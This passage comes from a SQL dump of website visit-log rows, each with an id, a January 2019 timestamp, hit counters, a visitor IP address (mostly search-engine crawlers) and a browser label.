0,0,'37.9.113.148','other'),(376307,1548271891,1,1,0,0,'87.250.224.65','other'),(376308,1548271999,1,1,0,0,'91.242.162.77','other'),(376309,1548272125,15,15,0,0,'216.244.66.241','other'),(376310,1548272302,1,1,0,0,'54.36.148.195','other'),(376311,1548272356,2,2,0,0,'178.154.171.27','other'),(376312,1548272427,1,1,0,0,'54.36.148.142','other'),(376313,1548272513,1,1,0,0,'54.36.149.86','other'),(376314,1548272555,1,1,0,0,'5.45.207.19','other'),(376315,1548272659,1,1,0,0,'54.36.148.67','other'),(376316,1548272775,1,1,0,0,'207.46.13.157','other'),(376317,1548273035,1,1,0,0,'95.108.181.75','other'),(376318,1548273083,1,1,0,0,'207.46.13.201','other'),(376319,1548273248,1,1,0,0,'216.244.66.241','other'),(376320,1548273798,1,1,0,0,'8.29.198.26','other'),(376321,1548274066,1,1,0,0,'54.36.148.88','other'),(376322,1548274112,1,1,0,0,'54.36.148.95','other'),(376323,1548274116,1,1,0,0,'54.36.149.42','other'),(376324,1548274195,1,1,0,0,'54.36.148.222','other'),(376325,1548274233,1,1,0,0,'207.46.13.202','other'),(376326,1548274749,1,1,0,0,'54.36.148.216','other'),(376327,1548274944,8,8,0,0,'216.244.66.241','other'),(376328,1548275054,2,2,0,0,'178.92.20.179','chrome'),(376329,1548275166,1,1,0,0,'46.229.168.145','other'),(376330,1548275204,1,1,0,0,'54.36.148.155','other'),(376331,1548275634,1,1,0,0,'8.29.198.25','other'),(376332,1548275641,1,1,0,0,'54.36.148.184','other'),(376333,1548275879,4,4,0,0,'216.244.66.241','other'),(376334,1548276218,1,1,0,0,'54.36.148.126','other'),(376335,1548276840,1,1,0,0,'66.249.75.21','chrome'),(376336,1548277120,1,1,0,0,'66.249.75.16','chrome'),(376337,1548277121,1,1,0,0,'66.249.75.20','chrome'),(376338,1548277123,1,1,0,0,'54.36.149.41','other'),(376339,1548277467,1,1,0,0,'54.36.148.231','other'),(376340,1548277658,12,12,0,0,'216.244.66.241','other'),(376341,1548277830,1,1,0,0,'157.55.39.66','other'),(376342,1548278130,1,1,0,0,'54.36.148.73','other'),(376343,1548278309,1,1,0,0,'54.36.148.171','other'),(376344,1548278603,3,3,0,0,'216.244.66.241','other'),(376345,1548278802,1,1,0,0,'54.36.148.231','other'),(376346,1548279065,1,1,0,0,'54.36.149.48','other'),(376347,1548279129,1,1,0,0,'54.36.148.114','other'),(376348,1548279468,1,1,0,0,'54.36.148.134','other'),(376349,1548279625,6,6,0,0,'216.244.66.241','other'),(376350,1548279718,1,1,0,0,'54.36.149.11','other'),(376351,1548279814,1,1,0,0,'54.36.148.142','other'),(376352,1548279911,1,1,0,0,'46.229.168.154','other'),(376353,1548279912,1,1,0,0,'54.36.148.76','other'),(376354,1548279913,1,1,0,0,'46.229.168.133','other'),(376355,1548280003,1,1,0,0,'54.36.148.120','other'),(376356,1548280220,2,2,0,0,'52.53.201.78','chrome'),(376357,1548280285,4,4,0,0,'157.55.39.8','other'),(376358,1548280290,5,5,0,0,'157.55.39.66','other'),(376359,1548280295,4,4,0,0,'207.46.13.202','other'),(376360,1548280299,4,4,0,0,'157.55.39.29','other'),(376361,1548280536,10,10,0,0,'216.244.66.241','other'),(376362,1548280707,1,1,0,0,'54.36.149.18','other'),(376363,1548280774,1,1,0,0,'54.36.148.118','other'),(376364,1548280791,1,1,0,0,'54.36.148.223','other'),(376365,1548281029,1,1,0,0,'178.154.244.65','other'),(376366,1548281098,1,1,0,0,'54.36.148.98','other'),(376367,1548281182,1,1,0,0,'91.242.162.77','other'),(376368,1548281213,1,1,0,0,'207.46.13.202','other'),(376369,1548281372,1,1,0,0,'54.36.148.21','other'),(376370,1548281505,1,1,0,0,'54.36.149.15','other'),(376371,1548281674,1,1,0,0,'54.36.149.106','other'),(376372,1548281718,2,2,0,0,'216.244.66.241','other'),(376373,1548281824,1,1,0,0,'157.55.39.29','other'),(376374,1548282129,1,1,0,0,'46.229.168.143','other'),(376375,1548282138,1,1,0,0,'176.36.21.189','chrome'),(376376,1548282271,1,1,0,0,'54.36.148.102','other'),(376377,1548282436,1,1,0,0,'54.36.149.9','other'),(376378,1548282451,1,1,0,0,'54.36.148.105','other'),(376379,1548282581,1,1,0,0,'54.36.148.38','other'),(376380,1548283038,1,1,0,0,'207.46.13.202','other'),(376381,1548283284,1,1,0,0,'54.36.149.7','other'),(376382,1548283661,1,1,0,0,'54.36.149.107','other'),(376383,1548283662,7,7,0,0,'216.244.66.241','other'),(376384,1548283946,1,1,0,0,'54.36.149.44','other'),(376385,1548284012,1,1,0,0,'54.36.149.77','other'),(376386,1548284155,1,1,0,0,'54.36.148.31','other'),(376387,1548284190,1,1,0,0,'54.36.148.227','other'),(376388,1548284294,2,2,0,0,'54.36.148.114','other'),(376389,1548284389,1,1,0,0,'13.66.139.0','other'),(376390,1548284589,1,1,0,0,'46.229.168.136','other'),(376391,1548284628,1,1,0,0,'8.29.198.27','other'),(376392,1548284706,2,2,0,0,'66.249.75.21','chrome'),(376393,1548284720,2,2,0,0,'157.55.39.8','other'),(376394,1548284819,1,1,0,0,'54.36.148.170','other'),(376395,1548284842,1,1,0,0,'54.36.149.84','other'),(376396,1548284948,1,1,0,0,'54.36.148.160','other'),(376397,1548285146,8,8,0,0,'216.244.66.241','other'),(376398,1548285149,1,1,0,0,'54.36.148.58','other'),(376399,1548285344,1,1,0,0,'54.36.148.40','other'),(376400,1548285405,1,1,0,0,'54.36.149.93','other'),(376401,1548285485,1,1,0,0,'54.36.148.252','other'),(376402,1548285518,1,1,0,0,'54.36.148.246','other'),(376403,1548285633,1,1,0,0,'54.36.149.10','other'),(376404,1548285707,1,1,0,0,'54.36.148.98','other'),(376405,1548286070,5,5,0,0,'216.244.66.241','other'),(376406,1548286430,2,2,0,0,'157.55.39.66','other'),(376407,1548286460,1,1,0,0,'8.29.198.26','other'),(376408,1548286508,1,1,0,0,'54.36.148.103','other'),(376409,1548286652,1,1,0,0,'54.36.148.31','other'),(376410,1548286721,1,1,0,0,'54.36.148.222','other'),(376411,1548286767,1,1,0,0,'54.36.149.16','other'),(376412,1548286881,1,1,0,0,'141.8.142.103','other'),(376413,1548287200,1,1,0,0,'171.67.70.46','other'),(376414,1548287339,1,1,0,0,'54.36.149.9','other'),(376416,1548287382,1,1,0,0,'46.229.168.132','other'),(376417,1548287496,1,1,0,0,'46.229.168.130','other'),(376418,1548287541,1,1,0,0,'157.55.39.66','other'),(376419,1548287637,1,1,0,0,'31.184.238.190','chrome'),(376420,1548287775,1,1,0,0,'46.229.168.142','other'),(376421,1548287777,1,1,0,0,'46.229.168.139','other'),(376422,1548288458,1,1,0,0,'54.36.149.0','other'),(376423,1548288462,1,1,0,0,'54.36.149.54','other'),(376424,1548288615,15,15,0,0,'216.244.66.241','other'),(376425,1548288627,1,1,0,0,'54.36.148.90','other'),(376426,1548288909,1,1,0,0,'46.229.168.145','other'),(376427,1548289210,1,1,0,0,'46.229.168.147','other'),(376428,1548289227,1,1,0,0,'40.77.167.90','other'),(376429,1548289365,1,1,0,0,'40.77.167.81','other'),(376430,1548289416,1,1,0,0,'171.67.70.64','other'),(376431,1548289462,1,1,0,0,'46.229.168.138','other'),(376432,1548289560,1,1,0,0,'54.36.148.167','other'),(376433,1548289585,1,1,0,0,'46.229.168.135','other'),(376434,1548289709,1,1,0,0,'216.244.66.241','other'),(376435,1548289876,1,1,0,0,'46.229.168.148','other'),(376436,1548290076,1,1,0,0,'94.180.141.70','msie'),(376437,1548290174,1,1,0,0,'54.36.148.179','other'),(376438,1548290281,1,1,0,0,'54.36.148.109','other'),(376439,1548290443,2,2,0,0,'5.45.207.19','other'),(376440,1548290566,1,1,0,0,'54.36.149.99','other'),(376441,1548290604,1,1,0,0,'54.36.148.194','other'),(376442,1548290822,1,1,0,0,'54.36.148.250','other'),(376443,1548291100,1,1,0,0,'54.36.148.190','other'),(376444,1548291164,1,1,0,0,'54.36.149.62','other'),(376445,1548291315,1,1,0,0,'46.165.230.5','other'),(376446,1548291563,15,15,0,0,'216.244.66.241','other'),(376447,1548291635,1,1,0,0,'46.229.168.135','other'),(376448,1548291723,1,1,0,0,'180.76.15.19','other'),(376449,1548291786,1,1,0,0,'54.36.149.94','other'),(376450,1548291863,1,1,0,0,'178.154.171.27','other'),(376451,1548291927,1,1,0,0,'178.154.171.30','other'),(376452,1548291928,1,1,0,0,'141.8.142.65','other'),(376453,1548292019,1,1,0,0,'54.36.149.89','other'),(376454,1548292122,2,2,0,0,'54.200.29.120','chrome'),(376455,1548292137,1,1,0,0,'5.255.253.16','other'),(376456,1548292528,1,1,0,0,'46.229.168.153','other'),(376457,1548292554,1,1,0,0,'176.36.21.189','chrome'),(376458,1548292644,1,1,0,0,'95.163.255.115','other'),(376459,1548292763,1,1,0,0,'216.244.66.241','other'),(376460,1548293062,1,1,0,0,'46.229.168.132','other'),(376461,1548293415,1,1,0,0,'178.154.244.11','other'),(376462,1548294190,20,20,0,0,'216.244.66.241','other'),(376463,1548295239,1,1,0,0,'216.244.66.241','other'),(376464,1548295302,1,1,0,0,'46.229.168.137','other'),(376465,1548295460,1,1,0,0,'8.29.198.27','other'),(376466,1548295829,1,1,0,0,'207.46.13.239','other'),(376467,1548296032,1,1,0,0,'95.163.255.113','other'),(376468,1548296590,1,1,0,0,'46.229.168.135','other'),(376469,1548296837,1,1,0,0,'95.163.255.119','other'),(376470,1548296967,14,14,0,0,'216.244.66.241','other'),(376471,1548297232,1,1,0,0,'95.163.255.113','other'),(376472,1548297286,2,2,0,0,'66.249.75.21','chrome'),(376473,1548297293,1,1,0,0,'8.29.198.27','other'),(376474,1548298436,2,2,0,0,'216.244.66.241','other'),(376475,1548299777,7,7,0,0,'216.244.66.241','other'),(376476,1548300476,1,1,0,0,'66.249.75.20','chrome'),(376477,1548300529,1,1,0,0,'157.55.39.186','other'),(376478,1548300607,1,1,0,0,'46.229.168.138','other'),(376479,1548300725,4,4,0,0,'216.244.66.241','other'),(376480,1548301091,2,2,0,0,'157.55.39.223','other'),(376481,1548302080,3,3,0,0,'95.108.213.4','other'),(376482,1548302496,1,1,0,0,'5.45.207.19','other'),(376483,1548302527,9,9,0,0,'216.244.66.241','other'),(376484,1548302658,1,1,0,0,'37.9.113.148','other'),(376485,1548302664,1,1,0,0,'178.154.244.11','other'),(376486,1548303011,1,1,0,0,'176.36.21.189','chrome'),(376487,1548303455,1,1,0,0,'213.180.203.40','other'),(376488,1548303581,3,3,0,0,'216.244.66.241','other'),(376489,1548303973,7,7,0,0,'91.242.162.23','other'),(376490,1548304088,2,2,0,0,'46.229.168.138','other'),(376491,1548304090,1,1,0,0,'46.229.168.132','other'),(376492,1548304136,1,1,0,0,'46.229.168.130','other'),(376493,1548304375,1,1,0,0,'207.46.13.32','other'),(376494,1548304383,1,1,0,0,'66.249.75.21','chrome'),(376495,1548304391,1,1,0,0,'54.36.148.91','other'),(376496,1548304437,1,1,0,0,'178.154.244.11','other'),(376497,1548304444,1,1,0,0,'54.36.149.40','other'),(376498,1548304665,1,1,0,0,'54.36.148.189','other'),(376499,1548304916,5,5,0,0,'91.242.162.23','other'),(376500,1548305068,1,1,0,0,'95.163.255.97','other'),(376501,1548305070,1,1,0,0,'95.163.255.92','other'),(376502,1548305232,2,2,0,0,'139.81.239.12','chrome'),(376503,1548305247,1,1,0,0,'54.36.148.42','other'),(376504,1548305288,11,11,0,0,'216.244.66.241','other'),(376505,1548305393,1,1,0,0,'46.229.168.141','other'),(376506,1548305496,2,2,0,0,'157.55.39.223','other'),(376507,1548306037,2,2,0,0,'91.242.162.23','other'),(376508,1548306072,1,1,0,0,'87.250.224.47','other'),(376509,1548306133,1,1,0,0,'54.36.148.194','other'),(376510,1548306144,1,1,0,0,'54.36.148.107','other'),(376511,1548306249,2,2,0,0,'216.244.66.241','other'),(376512,1548306288,1,1,0,0,'8.29.198.25','other'),(376513,1548306302,1,1,0,0,'54.36.148.50','other'),(376514,1548306428,1,1,0,0,'46.229.168.134','other'),(376515,1548306590,1,1,0,0,'54.36.148.195','other'),(376516,1548306635,1,1,0,0,'54.36.149.60','other'),(376517,1548306990,1,1,0,0,'54.36.148.121','other'),(376518,1548307182,4,4,0,0,'91.242.162.23','other'),(376519,1548307299,1,1,0,0,'54.36.148.252','other'),(376520,1548307564,1,1,0,0,'54.36.148.152','other'),(376521,1548307701,1,1,0,0,'54.36.149.82','other'),(376522,1548307858,1,1,0,0,'157.55.39.157','other'),(376523,1548307932,1,1,0,0,'54.36.149.63','other'),(376524,1548307986,1,1,0,0,'54.36.148.100','other'),(376525,1548308007,1,1,0,0,'54.36.148.155','other'),(376526,1548308067,12,12,0,0,'216.244.66.241','other'),(376527,1548308080,1,1,0,0,'54.36.148.189','other'),(376528,1548308121,1,1,0,0,'8.29.198.25','other'),(376529,1548308137,2,2,0,0,'91.242.162.23','other'),(376530,1548308178,1,1,0,0,'54.36.149.16','other'),(376531,1548308291,1,1,0,0,'157.55.39.223','other'),(376532,1548308537,1,1,0,0,'40.77.167.116','other'),(376533,1548308540,1,1,0,0,'54.36.148.103','other'),(376534,1548309140,1,1,0,0,'66.249.75.144','chrome'),(376535,1548309222,1,1,0,0,'66.249.75.20','chrome'),(376536,1548309296,1,1,0,0,'66.249.75.142','chrome'),(376537,1548309349,1,1,0,0,'54.36.148.174','other'),(376538,1548309382,2,2,0,0,'216.244.66.241','other'),(376539,1548309819,2,2,0,0,'91.242.162.23','other'),(376540,1548309939,1,1,0,0,'54.36.148.248','other'),(376541,1548310196,2,2,0,0,'109.70.100.21','other'),(376542,1548310395,1,1,0,0,'54.36.149.90','other'),(376543,1548310472,1,1,0,0,'54.36.148.161','other'),(376544,1548310603,1,1,0,0,'46.229.168.133','other'),(376545,1548310605,2,2,0,0,'46.229.168.137','other'),(376546,1548310867,1,1,0,0,'95.163.255.96','other'),(376547,1548310870,1,1,0,0,'95.163.255.95','other'),(376548,1548310888,5,5,0,0,'91.242.162.23','other'),(376549,1548310928,2,2,0,0,'66.249.75.20','chrome'),(376550,1548311031,5,5,0,0,'216.244.66.241','other'),(376551,1548311052,3,3,0,0,'66.249.75.153','chrome'),(376552,1548311055,2,2,0,0,'66.249.75.142','chrome'),(376553,1548311079,1,1,0,0,'66.249.75.140','chrome'),(376554,1548311090,2,2,0,0,'91.196.178.78','firefox'),(376555,1548311410,1,1,0,0,'54.36.148.31','other'),(376556,1548311609,1,1,0,0,'46.229.168.147','other'),(376557,1548311744,1,1,0,0,'54.36.149.104','other'),(376558,1548311876,1,1,0,0,'54.36.148.33','other'),(376559,1548311888,1,1,0,0,'54.36.148.96','other'),(376560,1548312000,1,1,0,0,'54.36.148.113','other'),(376561,1548312022,1,1,0,0,'54.36.148.157','other'),(376562,1548312036,1,1,0,0,'54.36.148.23','other'),(376563,1548312073,1,1,0,0,'46.229.168.144','other'),(376564,1548312170,1,1,0,0,'54.36.149.15','other'),(376565,1548312175,1,1,0,0,'54.36.148.240','other'),(376566,1548312337,1,1,0,0,'54.36.148.150','other'),(376567,1548312415,1,1,0,0,'66.249.75.155','chrome'),(376568,1548312417,1,1,0,0,'66.249.75.144','chrome'),(376569,1548312466,1,1,0,0,'66.249.69.148','chrome'),(376570,1548312559,1,1,0,0,'54.36.149.11','other'),(376571,1548312664,4,4,0,0,'91.242.162.23','other'),(376572,1548312691,1,1,0,0,'216.244.66.241','other'),(376573,1548313202,1,1,0,0,'54.36.148.226','other'),(376574,1548313208,1,1,0,0,'54.36.148.252','other'),(376575,1548313513,1,1,0,0,'54.36.148.251','other'),(376576,1548313590,1,1,0,0,'176.36.21.189','chrome'),(376577,1548313642,8,8,0,0,'216.244.66.241','other'),(376578,1548313702,3,3,0,0,'5.45.207.19','other'),(376579,1548313868,1,1,0,0,'178.154.244.11','other'),(376580,1548313907,1,1,0,0,'54.36.148.11','other'),(376581,1548314239,3,3,0,0,'91.242.162.23','other'),(376582,1548314253,1,1,0,0,'157.55.39.157','other'),(376583,1548314374,1,1,0,0,'46.229.168.135','other'),(376584,1548314376,1,1,0,0,'54.36.148.53','other'),(376585,1548314415,2,2,0,0,'5.45.207.8','other'),(376586,1548314673,4,4,0,0,'216.244.66.241','other'),(376587,1548315125,1,1,0,0,'46.229.168.149','other'),(376588,1548315180,2,2,0,0,'23.228.96.82','chrome'),(376589,1548315220,1,1,0,0,'54.36.149.18','other'),(376590,1548315317,1,1,0,0,'54.36.148.18','other'),(376591,1548315324,1,1,0,0,'94.180.152.89','chrome'),(376592,1548315366,5,5,0,0,'91.242.162.23','other'),(376593,1548315483,1,1,0,0,'54.36.148.165','other'),(376594,1548315627,2,2,0,0,'95.133.56.174','chrome'),(376595,1548315742,6,6,0,0,'216.244.66.241','other'),(376596,1548315746,1,1,0,0,'54.36.148.242','other'),(376597,1548315794,1,1,0,0,'66.249.69.144','chrome'),(376598,1548315798,1,1,0,0,'66.249.69.150','chrome'),(376599,1548315883,1,1,0,0,'54.36.148.214','other'),(376600,1548315923,1,1,0,0,'54.36.149.12','other'),(376601,1548316081,1,1,0,0,'178.154.244.11','other'),(376602,1548316107,2,2,0,0,'91.196.177.26','chrome'),(376603,1548316243,1,1,0,0,'66.249.69.148','chrome'),(376604,1548316584,1,1,0,0,'54.36.148.66','other'),(376605,1548316722,1,1,0,0,'46.229.168.130','other'),(376606,1548316811,1,1,0,0,'54.36.148.247','other'),(376607,1548317113,1,1,0,0,'8.29.198.27','other'),(376608,1548317289,1,1,0,0,'54.36.149.55','other'),(376609,1548317511,3,3,0,0,'91.242.162.23','other'),(376610,1548317580,8,8,0,0,'216.244.66.241','other'),(376611,1548317783,3,3,0,0,'37.55.59.102','chrome'),(376612,1548318149,1,1,0,0,'54.36.148.86','other'),(376613,1548318174,1,1,0,0,'46.229.168.130','other'),(376614,1548318606,1,1,0,0,'54.36.148.252','other'),(376615,1548318732,1,1,0,0,'54.36.149.61','other'),(376616,1548318839,1,1,0,0,'54.36.149.0','other'),(376617,1548318939,1,1,0,0,'157.55.39.157','other'),(376618,1548318953,1,1,0,0,'8.29.198.25','other'),(376619,1548318995,1,1,0,0,'54.36.148.222','other'),(376620,1548319223,2,2,0,0,'216.244.66.241','other'),(376621,1548319347,1,1,0,0,'54.36.148.156','other'),(376622,1548319397,1,1,0,0,'54.36.148.123','other'),(376623,1548319414,1,1,0,0,'54.36.148.39','other'),(376624,1548320030,2,2,0,0,'91.196.178.131','firefox'),(376625,1548320094,1,1,0,0,'46.229.168.136','other'),(376626,1548320177,1,1,0,0,'178.92.138.216','chrome'),(376627,1548320350,3,3,0,0,'46.133.106.21','chrome'),(376628,1548320367,1,1,0,0,'54.36.148.188','other'),(376629,1548320383,7,7,0,0,'216.244.66.241','other'),(376630,1548320896,1,1,0,0,'54.36.148.79','other'),(376631,1548320935,1,1,0,0,'54.36.148.245','other'),(376632,1548321001,1,1,0,0,'54.36.148.38','other'),(376633,1548321243,1,1,0,0,'54.36.148.12','other'),(376634,1548321933,1,1,0,0,'66.249.69.145','chrome'),(376635,1548321936,1,1,0,0,'66.249.69.150','chrome'),(376636,1548321971,11,11,0,0,'216.244.66.241','other'),(376637,1548322261,1,1,0,0,'91.196.178.66','chrome'),(376638,1548322367,1,1,0,0,'54.36.148.200','other'),(376639,1548322384,2,2,0,0,'31.13.127.4','other'),(376640,1548322388,1,1,0,0,'31.13.127.13','other'),(376641,1548322389,1,1,0,0,'31.13.127.3','other'),(376642,1548322414,1,1,0,0,'54.36.149.79','other'),(376643,1548322465,1,1,0,0,'173.252.127.14','other'),(376644,1548322484,1,1,0,0,'46.211.113.87','chrome'),(376645,1548322492,1,1,0,0,'66.220.149.25','other'),(376646,1548322494,1,1,0,0,'91.196.178.44','chrome'),(376647,1548322582,1,1,0,0,'94.254.248.197','chrome'),(376648,1548322637,1,1,0,0,'54.36.149.12','other'),(376649,1548322647,1,1,0,0,'91.196.178.29','chrome'),(376650,1548322649,1,1,0,0,'46.211.24.86','chrome'),(376651,1548322657,1,1,0,0,'46.229.168.134','other'),(376652,1548322809,1,1,0,0,'54.36.148.116','other'),(376653,1548322831,1,1,0,0,'46.211.73.17','chrome'),(376654,1548322997,1,1,0,0,'66.249.69.148','chrome'),(376655,1548323019,1,1,0,0,'91.196.178.73','chrome'),(376656,1548323034,1,1,0,0,'213.180.203.40','other'),(376657,1548323039,2,2,0,0,'87.250.224.118','other'),(376658,1548323041,2,2,0,0,'185.109.54.86','chrome'),(376659,1548323254,6,6,0,0,'216.244.66.241','other'),(376660,1548323386,1,1,0,0,'54.36.148.156','other'),(376661,1548323470,1,1,0,0,'173.252.127.18','other'),(376662,1548323677,1,1,0,0,'54.36.148.125','other'),(376663,1548323818,1,1,0,0,'54.36.148.162','other'),(376664,1548323879,1,1,0,0,'54.36.148.225','other'),(376665,1548323941,1,1,0,0,'91.196.178.163','chrome'),(376666,1548324114,1,1,0,0,'66.249.75.142','chrome'),(376667,1548324264,1,1,0,0,'46.229.168.136','other'),(376668,1548324286,1,1,0,0,'46.219.229.23','chrome'),(376669,1548324292,1,1,0,0,'54.36.148.68','other'),(376670,1548324327,1,1,0,0,'95.132.24.193','chrome'),(376671,1548324492,1,1,0,0,'173.252.87.2','other'),(376672,1548324493,1,1,0,0,'173.252.87.12','other'),(376674,1548324642,3,3,0,0,'91.196.178.66','chrome'),(376675,1548324657,1,1,0,0,'157.55.39.118','other'),(376676,1548324709,1,1,0,0,'54.36.148.196','other'),(376677,1548324756,6,6,0,0,'216.244.66.241','other'),(376678,1548324930,1,1,0,0,'54.36.148.61','other'),(376679,1548324939,2,2,0,0,'91.196.178.71','firefox'),(376680,1548325025,2,2,0,0,'54.36.149.106','other'),(376681,1548325181,1,1,0,0,'54.36.148.111','other'),(376682,1548325192,1,1,0,0,'66.249.75.144','chrome'),(376683,1548325263,1,1,0,0,'54.36.149.88','other'),(376684,1548325384,1,1,0,0,'46.229.168.150','other'),(376685,1548325530,1,1,0,0,'40.77.167.207','other'),(376686,1548325716,6,6,0,0,'216.244.66.241','other'),(376687,1548325832,2,2,0,0,'91.196.178.45','chrome'),(376688,1548325967,2,2,0,0,'46.211.43.157','chrome'),(376689,1548326025,1,1,0,0,'54.36.149.53','other'),(376690,1548326203,1,1,0,0,'54.36.149.98','other'),(376691,1548326314,1,1,0,0,'54.36.149.92','other'),(376692,1548326321,1,1,0,0,'173.252.79.3','other'),(376693,1548326405,1,1,0,0,'91.196.178.131','other'),(376694,1548326422,1,1,0,0,'54.36.148.163','other'),(376695,1548326484,2,2,0,0,'91.196.178.71','firefox'),(376696,1548326570,2,2,0,0,'54.184.28.233','chrome'),(376697,1548326616,1,1,0,0,'46.229.168.129','other'),(376698,1548326882,1,1,0,0,'54.36.149.68','other'),(376699,1548326977,1,1,0,0,'91.196.178.101','other'),(376700,1548327090,1,1,0,0,'54.36.149.104','other'),(376701,1548327132,1,1,0,0,'54.36.149.100','other'),(376702,1548327274,1,1,0,0,'66.249.75.144','chrome'),(376703,1548327411,1,1,0,0,'54.36.149.31','other'),(376704,1548327464,1,1,0,0,'5.188.210.53','chrome'),(376705,1548327485,1,1,0,0,'5.45.207.79','other'),(376706,1548327531,9,9,0,0,'216.244.66.241','other'),(376707,1548327562,2,2,0,0,'5.45.207.19','other'),(376708,1548327653,1,1,0,0,'91.196.178.71','firefox'),(376709,1548327910,3,3,0,0,'194.183.173.167','chrome'),(376710,1548327940,1,1,0,0,'8.29.198.25','other'),(376711,1548327993,3,3,0,0,'95.108.213.4','other'),(376712,1548328097,1,1,0,0,'54.36.148.149','other'),(376713,1548328180,1,1,0,0,'54.36.148.132','other'),(376714,1548328248,1,1,0,0,'178.154.244.11','other'),(376715,1548328252,1,1,0,0,'54.36.148.185','other'),(376716,1548328490,1,1,0,0,'141.8.142.81','other'),(376717,1548328522,1,1,0,0,'66.249.75.21','chrome'),(376718,1548328552,7,7,0,0,'216.244.66.241','other'),(376719,1548328643,1,1,0,0,'173.252.87.8','other'),(376720,1548328650,1,1,0,0,'54.36.149.44','other'),(376721,1548328722,1,1,0,0,'66.249.75.142','chrome'),(376722,1548328842,1,1,0,0,'46.229.168.147','other'),(376723,1548329354,3,3,0,0,'91.196.178.71','firefox'),(376724,1548329584,1,1,0,0,'46.229.168.133','other'),(376725,1548329799,1,1,0,0,'8.29.198.25','other'),(376726,1548329880,1,1,0,0,'178.154.171.24','other'),(376727,1548329950,1,1,0,0,'213.180.203.40','other'),(376728,1548329974,1,1,0,0,'66.249.75.17','chrome'),(376729,1548329979,2,2,0,0,'66.249.75.21','chrome'),(376730,1548330076,1,1,0,0,'66.249.75.16','chrome'),(376731,1548330199,1,1,0,0,'54.36.149.88','other'),(376732,1548330266,1,1,0,0,'157.55.39.92','other'),(376733,1548330337,1,1,0,0,'91.196.178.87','firefox'),(376734,1548330379,1,1,0,0,'54.36.148.145','other'),(376735,1548330520,3,3,0,0,'216.244.66.241','other'),(376736,1548330522,1,1,0,0,'54.36.148.24','other'),(376737,1548330564,1,1,0,0,'54.36.148.186','other'),(376738,1548330672,1,1,0,0,'54.36.149.105','other'),(376739,1548330724,1,1,0,0,'54.36.148.224','other'),(376740,1548330735,1,1,0,0,'54.36.148.142','other'),(376741,1548330824,1,1,0,0,'31.13.127.15','other'),(376742,1548331206,1,1,0,0,'54.36.148.171','other'),(376743,1548331257,2,2,0,0,'178.92.74.162','chrome'),(376744,1548331478,4,4,0,0,'216.244.66.241','other'),(376745,1548331608,1,1,0,0,'54.36.149.70','other'),(376746,1548331642,1,1,0,0,'54.36.149.33','other'),(376747,1548331673,1,1,0,0,'91.196.178.129','other'),(376748,1548331726,1,1,0,0,'54.36.148.222','other'),(376749,1548331827,1,1,0,0,'54.36.148.189','other'),(376750,1548331945,1,1,0,0,'54.36.148.172','other'),(376751,1548332405,1,1,0,0,'66.249.75.155','chrome'),(376752,1548332426,1,1,0,0,'66.249.75.140','chrome'),(376753,1548332451,1,1,0,0,'54.36.148.156','other'),(376754,1548332490,1,1,0,0,'54.36.148.254','other'),(376755,1548332635,1,1,0,0,'54.36.149.10','other'),(376756,1548332666,1,1,0,0,'54.36.148.209','other'),(376757,1548332769,1,1,0,0,'46.211.134.39','chrome'),(376758,1548332818,1,1,0,0,'173.252.87.5','other'),(376759,1548332899,1,1,0,0,'54.36.148.145','other'),(376760,1548332999,1,1,0,0,'54.36.148.194','other'),(376761,1548333080,3,3,0,0,'216.244.66.241','other'),(376762,1548333276,2,2,0,0,'92.112.6.135','chrome'),(376763,1548333282,1,1,0,0,'95.163.255.97','other'),(376764,1548333285,1,1,0,0,'95.163.255.92','other'),(376765,1548333410,1,1,0,0,'5.45.207.79','other'),(376766,1548333515,2,2,0,0,'91.196.178.66','chrome'),(376767,1548333589,1,1,0,0,'54.36.148.249','other'),(376768,1548333662,1,1,0,0,'54.36.148.185','other'),(376769,1548333880,2,2,0,0,'91.209.11.236','other'),(376770,1548333980,2,2,0,0,'94.178.161.84','chrome'),(376771,1548334026,1,1,0,0,'54.36.148.224','other'),(376772,1548334066,6,6,0,0,'216.244.66.241','other'),(376773,1548334186,1,1,0,0,'54.36.148.117','other'),(376774,1548334616,1,1,0,0,'54.36.149.40','other'),(376775,1548334646,1,1,0,0,'180.76.15.134','other'),(376776,1548334824,3,3,0,0,'91.196.178.66','chrome'),(376777,1548334845,1,1,0,0,'54.36.149.48','other'),(376778,1548334926,1,1,0,0,'173.252.127.4','other'),(376779,1548335199,1,1,0,0,'54.36.148.75','other'),(376780,1548335245,2,2,0,0,'78.111.187.179','chrome'),(376781,1548335317,1,1,0,0,'54.36.148.218','other'),(376782,1548335415,1,1,0,0,'46.229.168.146','other'),(376783,1548335449,1,1,0,0,'54.36.148.117','other'),(376784,1548335629,1,1,0,0,'46.229.168.135','other'),(376785,1548335756,1,1,0,0,'54.36.148.132','other'),(376786,1548335773,1,1,0,0,'213.109.225.10','chrome'),(376787,1548335824,19,19,0,0,'216.244.66.241','other'),(376788,1548335845,1,1,0,0,'54.36.148.221','other'),(376789,1548336118,1,1,0,0,'54.36.148.112','other'),(376790,1548336372,1,1,0,0,'207.46.13.229','other'),(376791,1548336572,1,1,0,0,'46.229.168.142','other'),(376792,1548336642,1,1,0,0,'54.36.148.43','other'),(376793,1548336655,1,1,0,0,'54.36.148.153','other'),(376794,1548336727,5,5,0,0,'216.244.66.241','other'),(376795,1548336777,1,1,0,0,'54.36.148.184','other'),(376796,1548336817,1,1,0,0,'54.36.148.199','other'),(376797,1548336822,1,1,0,0,'54.36.149.73','other'),(376798,1548336978,1,1,0,0,'54.36.148.229','other'),(376799,1548337141,1,1,0,0,'54.36.148.95','other'),(376800,1548337174,1,1,0,0,'207.46.13.116','other'),(376801,1548337282,1,1,0,0,'54.36.148.202','other'),(376802,1548337288,1,1,0,0,'54.36.148.203','other'),(376803,1548337320,2,2,0,0,'95.133.63.68','chrome'),(376804,1548337464,1,1,0,0,'54.36.148.149','other'),(376805,1548337562,1,1,0,0,'54.36.148.97','other'),(376806,1548337632,2,2,0,0,'216.244.66.241','other'),(376807,1548337686,1,1,0,0,'66.249.75.22','chrome'),(376808,1548337688,1,1,0,0,'66.249.75.21','chrome'),(376809,1548337753,1,1,0,0,'54.36.148.98','other'),(376810,1548338287,1,1,0,0,'54.36.148.154','other'),(376811,1548338336,1,1,0,0,'95.163.255.96','other'),(376812,1548338341,1,1,0,0,'95.163.255.97','other'),(376813,1548338395,1,1,0,0,'54.36.148.64','other'),(376814,1548338475,2,2,0,0,'207.46.13.113','other'),(376815,1548338489,2,2,0,0,'178.154.244.11','other'),(376816,1548338550,1,1,0,0,'54.36.149.50','other'),(376817,1548338602,3,3,0,0,'216.244.66.241','other'),(376818,1548338684,1,1,0,0,'54.36.148.126','other'),(376819,1548338689,1,1,0,0,'178.154.17